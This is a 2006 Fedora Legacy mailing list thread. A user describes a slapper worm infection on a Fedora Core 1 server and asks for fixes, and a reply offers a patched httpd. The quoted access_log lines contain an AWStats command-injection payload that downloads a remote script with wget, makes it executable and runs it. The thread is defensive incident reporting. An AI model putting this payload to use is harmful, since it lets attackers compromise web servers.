-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Michael Mansour wrote: > Hi guys, > > I have an FC1 machine which got infected twice with the slapper worm, and then > started DOS attacking a large vendor. > > I've stopped slapper in its tracks with a couple of changes to FC1, but in > analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache > SSL server which I've now turned off), I see the following bit of interest in > my apache access_log: > > 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET > /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| > HTTP/1.1" > 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" > 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| > HTTP/1.1" > 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" > > These "scripz" files end up going into /tmp, being compiled with gcc, renamed > to "httpd" and run as that. > > I'm using: > > perl-5.8.3-17.4.legacy > httpd-2.0.51-1.9.legacy > openssl-0.9.7a-33.13.legacy > > Are there any updates FL can do to any of the packages to fix/block slapper > from an FC1 machine? > > Michael. > Michael, Try my version of httpd here: http://support.intcomgrp.com/~jkosin It has been effective against the worm so far. James Kosin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFD1T+ukNLDmnu1kSkRAv20AJ0d7pl7B6zAOZb+OmhkiiKG/Fpp1ACfcnmE gJoc286M9LvSAXn2cjXHEok= =5ZOF -----END PGP SIGNATURE----- -- Scanned by ClamAV - http://www.clamav.net -- fedora-legacy-list@xxxxxxxxxx https://www.redhat.com/mailman/listinfo/fedora-legacy-list
